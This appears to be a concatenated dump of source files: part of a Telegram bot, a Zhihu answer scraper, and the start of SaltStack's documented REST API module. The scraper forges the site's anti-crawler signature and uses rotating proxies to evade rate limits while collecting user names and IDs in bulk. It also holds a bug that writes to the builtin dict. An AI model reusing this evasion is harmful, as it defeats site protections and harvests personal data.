InlineKeyboardButton(
text="🖤 About and donate 🖤", callback_data="h_about"
)
],
[InlineKeyboardButton(text="Go back 🔙", callback_data="back_btn")],
]
),
)
def h_for_funcs(update, context):
query = update.callback_query
query.answer()
match = query.data.split("_")[1]
markup = InlineKeyboardMarkup(
[[InlineKeyboardButton(text="Go back 🔙", callback_data="back_btn_help")]]
)
if match == "mv":
query.message.edit_caption(caption=st.MOVIE_HELP, reply_markup=markup)
elif match == "music":
query.message.edit_caption(caption=st.MUSIC_HELP, reply_markup=markup)
elif match == "anime":
query.message.edit_caption(caption=st.ANIME_HELP, reply_markup=markup)
elif match == "misc":
query.message.edit_caption(caption=st.MISC_HELP, reply_markup=markup)
elif match == "about":
query.message.edit_caption(
caption=st.ABOUT_STR,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(
text="Github 🔭", url="https://github.com/starry69"
),
InlineKeyboardButton(
text="Donate 🖤", url="paypal.me/starryrays"
),
],
[
InlineKeyboardButton(
text="Go back 🔙", callback_data="back_btn_help"
)
],
]
),
)
@run_async
def back_btn(update, context):
query = update.callback_query
query.answer()
match = query.data.split("_")
if "help" in match:
return help_button(update)
stuff = Starter(update.effective_user.first_name)
query.message.edit_caption(caption=stuff.text, reply_markup=stuff.reply_markup)
BANNER = r"""
___ ___ ______ ___
/ _ \ | | | ___ \ | |
/ /_\ \ ___ _ _| |_ ___| |_/ / ___ | |_
| _ |/ __| | | | __/ _ \ ___ \/ _ \| __|
| | | | (__| |_| | || __/ |_/ / (_) | |_
\_| |_/\___|\__,_|\__\___\____/ \___/ \__|
Is Running 🎶🎶🎵
"""
def main():
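    # /reboot handler (restricted to DEV_ID): stop the updater from a separate
    # thread, then replace the current process with a fresh copy via os.execl().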
def stop_and_restart():
updater.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
def restart(update, context):
context.bot.sendMessage(update.effective_chat.id, "Rebooted ✨")
Thread(target=stop_and_restart).start()
restart_handler = CommandHandler("reboot", restart, filters=Filters.user(DEV_ID))
start_handler = CommandHandler("start", start)
help_funcs_handler = CallbackQueryHandler(h_for_funcs, pattern=r"h_")
help_handler = CallbackQueryHandler(help_button, pattern=r"help")
back_btn_handler = CallbackQueryHandler(back_btn, pattern=r"back_btn")
dp.add_handler(restart_handler)
dp.add_handler(start_handler)
dp.add_handler(help_funcs_handler)
dp.add_handler(help_handler)
dp.add_handler(back_btn_handler)
LOG.info("%s", BANNER)
# Start the bot.
updater.start_polling(timeout=15, read_latency=4)
updater.idle()
if __name__ == "__main__":
main()
|
zhihu_answer.py
|
import requests
import json
import re
import threading
import time
import os
import hashlib
import execjs
from spider.ProxyPool import Proxy_pool
class zhihu_answer():
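    # NOTE: the attributes below are class-level, so they are shared by every
    # instance of zhihu_answer (the script only ever creates one instance).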
question_id = 0
begin_id = 0
similar_question_url_list = []
copy_list = []
question_count = 20
proxy_pool = Proxy_pool()
def __init__(self, begin_id, question_id, question_count=20):
self.cookie = ''
self.begin_id = begin_id
self.question_id = question_id
self.question_count = question_count
self.header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
"cookie": self.cookie
}
def get_headers(self, api_url):
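        # Build Zhihu's anti-crawler signature headers: take the d_c0 value out of
        # the cookie, md5 the string "101_3_2.0+<api path>+<d_c0>", then run the
        # digest through the site's g_encrypt.js routine to obtain x-zse-96.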
star = 'd_c0='
end = ';'
if self.cookie == "":
            raise Exception("Please enter your cookie at line 22 (self.cookie)")
cookie_mes = self.cookie[self.cookie.index(star):].replace(star, '')
cookie_mes = cookie_mes[:cookie_mes.index(end)]
parse_url = api_url.replace("https://www.zhihu.com", "")
f = "+".join(["101_3_2.0", parse_url, cookie_mes])
fmd5 = hashlib.new('md5', f.encode()).hexdigest()
with open(os.path.dirname(__file__) + os.sep + 'g_encrypt.js', 'r', encoding="utf-8") as f:
ctx1 = execjs.compile(f.read(), cwd=os.path.dirname(os.getcwd()) + os.sep + 'node_modules')
encrypt_str = "2.0_%s" % ctx1.call('b', fmd5)
self.header["x-app-za"] = 'OS=Web'
self.header["x-zse-93"] = "101_3_2.0"
self.header["x-zse-96"] = encrypt_str
# print(self.header["x-zse-96"])
return self.header
def get_answer(self, question_id, limit=1):
now = 0
total_num = self.get_total(question_id)
limit = min(total_num, limit)
content_list = []
author_name_list = []
author_id_list = []
author_url_token_list = []
        result = {}
for i in range(0, total_num // limit):
url = "https://www.zhihu.com/api/" \
"v4/questions/{question_id}/answers?include=data%5B*%5D." \
"is_normal%2Cadmin_closed_comment%2Creward_info%2Cis_co" \
"llapsed%2Cannotation_action%2Cannotation_detail%2Ccollapse" \
"_reason%2Cis_sticky%2Ccollapsed_by%2Csuggest_edit%2Ccomment_co" \
"unt%2Ccan_comment%2Ccontent%2Ceditable_content%2Cattachment%2Cvote" \
"up_count%2Creshipment_settings%2Ccomment_permission%2Ccreated_time%2C" \
"updated_time%2Creview_info%2Crelevant_info%2Cquestion%2Cexcerpt%2Cis_labe" \
"led%2Cpaid_info%2Cpaid_info_content%2Crelationship.is_authorized%2Cis_author%" \
"2Cvoting%2Cis_thanked%2Cis_nothelp%2Cis_recognized%3Bdata%5B*%5D.mark_infos%5B*%5D" \
".url%3Bdata%5B*%5D.author.follower_count%2Cbadge%5B*%5D.topics%3Bdata%5B*%5D.settings." \
"table_of_content.enabled&offset={now}&limit={limit}&sort_by=default&platform=desktop".format(
question_id=str(question_id), limit=limit, now=now)
response = self.proxy_pool.get(url, headers=self.get_headers(url), anonymity=False)
json_result = json.loads(response.content)
data = json_result["data"]
print("\r爬取进度:" + str(round(i / (total_num // limit) * 100, 2)) + "%", end="", flush=True)
for i in data:
content_list.append(i["content"])
author_name_list.append(i['author']['name'])
author_id_list.append(i['author']['id'])
author_url_token_list.append(i['author']['url_token'])
now = now + limit
dict["content_list"] = content_list
dict["author_name_list"] = author_name_list
dict["author_id_list"] = author_id_list
dict["author_url_token_list"] = author_url_token_list
return dict
def get_total(self, question_id):
# time.sleep(1)
url = "https://www.zhihu.com/api/" \
"v4/questions/{question_id}/answers?include=data%5B*%5D." \
"is_normal%2Cadmin_closed_comment%2Creward_info%2Cis_co" \
"llapsed%2Cannotation_action%2Cannotation_detail%2Ccollapse" \
"_reason%2Cis_sticky%2Ccollapsed_by%2Csuggest_edit%2Ccomment_co" \
"unt%2Ccan_comment%2Ccontent%2Ceditable_content%2Cattachment%2Cvote" \
"up_count%2Creshipment_settings%2Ccomment_permission%2Ccreated_time%2C" \
"updated_time%2Creview_info%2Crelevant_info%2Cquestion%2Cexcerpt%2Cis_labe" \
"led%2Cpaid_info%2Cpaid_info_content%2Crelationship.is_authorized%2Cis_author%" \
"2Cvoting%2Cis_thanked%2Cis_nothelp%2Cis_recognized%3Bdata%5B*%5D.mark_infos%5B*%5D" \
".url%3Bdata%5B*%5D.author.follower_count%2Cbadge%5B*%5D.topics%3Bdata%5B*%5D.settings." \
"table_of_content.enabled&offset=&limit={limit}&sort_by=default&platform=desktop".format(
question_id=str(question_id), limit=20)
response = self.proxy_pool.get(url, headers=self.get_headers(url), anonymity=False)
json_result = json.loads(response.content)
next_json = json_result
total_num = next_json['paging']['totals']
return total_num
def format_content(self, content_list):
text_list = []
pre = re.compile('>(.*?)<')
for i in content_list:
text = ''.join(pre.findall(i))
text_list.append(text)
return text_list
def get_question_title(self, question_id):
url = f"https://www.zhihu.com/api/v4/questions/{question_id}/answers?" \
"include=data%5B*%5D.is_normal%2Cadmin_closed_comment%2Creward_info%2Cis_co" \
"llapsed%2Cannotation_action%2Cannotation_detail%2Ccollapse" \
"_reason%2Cis_sticky%2Ccollapsed_by%2Csuggest_edit%2Ccomment_co" \
"unt%2Ccan_comment%2Ccontent%2Ceditable_content%2Cattachment%2Cvote" \
"up_count%2Creshipment_settings%2Ccomment_permission%2Ccreated_time%2C" \
"updated_time%2Creview_info%2Crelevant_info%2Cquestion%2Cexcerpt%2Cis_labe" \
"led%2Cpaid_info%2Cpaid_info_content%2Crelationship.is_authorized%2Cis_author%" \
"2Cvoting%2Cis_thanked%2Cis_nothelp%2Cis_recognized%3Bdata%5B*%5D.mark_infos%5B*%5D" \
".url%3Bdata%5B*%5D.author.follower_count%2Cbadge%5B*%5D.topics%3Bdata%5B*%5D.settings." \
"table_of_content.enabled&offset=0&limit=3&sort_by=default&platform=desktop"
# print(url)
response = self.proxy_pool.get(url, headers=self.get_headers(url), anonymity=False)
json_result = json.loads(response.content)
data = json_result["data"]
title = data[0]['question']['title']
return title
def single_answer(self, question_id):
question_title = self.get_question_title(question_id)
print("全部回答数量:" + str(self.get_total(question_id)))
print("爬取的问题:" + question_title + "——问题id为:" + str(question_id))
print("爬取ing.....请等待,等待时间依据回答数量而定")
try:
result_dict = self.get_answer(question_id, limit=20)
# self.get_answer(question_id)
text_list = self.format_content(result_dict['content_list'])
result_path = os.path.dirname(os.getcwd()) + os.sep + "result"
if not os.path.exists(result_path):
os.mkdir(result_path)
with open(os.path.dirname(os.getcwd()) + os.sep + "result" + os.sep + question_title + ".txt", mode="w",
encoding='utf-8') as f:
f.write("问题:" + question_title + "\n")
f.write("问题id:" + str(question_id) + "\n\n")
for i in range(0, len(text_list)):
f.write("回答者id:" + result_dict["author_id_list"][i] + "\n")
f.write("回答者空间地址:" + result_dict["author_url_token_list"][i] + "\n")
f.write("回答者昵称:" + result_dict["author_name_list"][i] + "\n")
f.write("回答的内容:" + text_list[i] + "\n\n")
f.close()
        except Exception:
            # Swallow failures for this question so the crawl of others can continue
            pass
        finally:
            print("\nCrawl finished")
def get_next_question(self, question):
url = "https://www.zhihu.com/api/v4/questions/{question_id}/similar-questions?include=data%5B*%5D.answer_count%2Cauthor%2Cfollower_count&limit=5".format(
question_id=question)
# print(url)
response = self.proxy_pool.get(url, headers=self.get_headers(url), anonymity=False)
# print(response.text)
json_result = json.loads(response.content)
url_list = json_result['data']
# with open("questions_id.txt", mode="a", encoding='utf-8') as f:
for i in url_list:
            if i['id'] not in self.copy_list:
self.similar_question_url_list.append(i['id'])
self.copy_list.append(i['id'])
# self.copy_list.append(i['id'])
# f.write(str(i['id'])+"\n")
print(i['id'])
if len(self.copy_list) >= self.question_count:
return
self.get_parse_question()
# return self.similar_question_url_list
# f.close()
def get_parse_question(self):
        # Iterate over a copy: the recursion below and remove() both mutate the list.
        for i in list(self.similar_question_url_list):
try:
self.get_next_question(i)
self.similar_question_url_list.remove(i)
except:
pass
if len(self.copy_list) >= self.question_count:
return
def download_all_similar_question(self):
threads = []
if len(self.copy_list) >= self.question_count:
for i in self.copy_list:
time.sleep(1)
th = threading.Thread(target=self.single_answer, args=(i,))
# print(th.name)
th.start()
threads.append(th)
for th in threads:
th.join()
elif (len(self.copy_list) == 0):
self.get_next_question(self.begin_id)
self.download_all_similar_question()
else:
self.get_next_question(self.copy_list[len(self.copy_list) - 1])
self.download_all_similar_question()
if __name__ == '__main__':
    model = input("Choose a mode: 1. Crawl a single question  2. Crawl related questions (due to Zhihu rate limiting, the thread start interval is set to 1s here, or use high-anonymity proxies)\n")
    id = input("Enter the id of the question to crawl, or the id of the starting question for related questions:\n")
if int(model) == 1:
zhihu = zhihu_answer(id, id)
zhihu.single_answer(id)
elif int(model) == 2:
        count = input("Enter how many related questions to crawl (default 20, max 400; Zhihu triggers anti-crawler verification above 500, which an IP proxy can work around):\n")
try:
count = int(count)
except:
print("输入非数字,默认20开始爬取")
count = 20
zhihu = zhihu_answer(id, id, count)
zhihu.download_all_similar_question()
else:
print("请输入规范数字1或2")
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://github.com/cherrypy/cherrypy/issues/1298>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
    .. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
    .. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
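Expressed as Python data (an illustrative sketch, not part of the API itself),
the request body is simply a list of such command dictionaries:

.. code-block:: python

    # One dictionary per command; the request body is a list of these.
    commands = [{
        "client": "local",   # 1. the client interface
        "tgt": "*",          # target expression (required by LocalClient)
        "fun": "test.ping",  # 2. the function to run
    }]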
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`client interfaces <netapi-clients>`
documentation, but in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<netapi-clients>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
but cannot express nested data structures, which many Salt commands require
(for example, starting a state run that takes Pillar data). Salt's CLI tool can
reformat strings passed at the CLI into complex data structures, and that
behavior also works via salt-api, but it can be brittle; since salt-api accepts
JSON it is best just to send JSON.
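For example, sending JSON from Python with the ``requests`` library and picking
the response format via the Accept header (a minimal sketch; the ``saltdev``
credentials and the ``auto`` eauth backend simply mirror the login example
above):

.. code-block:: python

    import requests

    session = requests.Session()
    # Log in first; the session cookie then carries the eauth token.
    session.post('http://localhost:8000/login', json={
        'username': 'saltdev', 'password': 'saltdev', 'eauth': 'auto'})

    # JSON request body via ``json=``; the Accept header picks the response format.
    resp = session.post('http://localhost:8000',
                        headers={'Accept': 'application/x-yaml'},
                        json=[{'client': 'local', 'tgt': '*', 'fun': 'test.ping'}])
    print(resp.text)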
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import os
import signal
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy # pylint: disable=3rd-party-module-not-gated
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
    .. versionadded:: 2016.3.0
    Verifies user requests against the API whitelist (user/IP pairs) in order
    to provide IP-based whitelisting for the API, similar to the master's ACL
    but enforced at the API layer.
    .. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
    success_str = ("[api_acl] Authentication successful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except (cherrypy.TimeoutError, salt.exceptions.SaltClientTimeout):
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
            'return': '{0}'.format(traceback.format_exc())
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
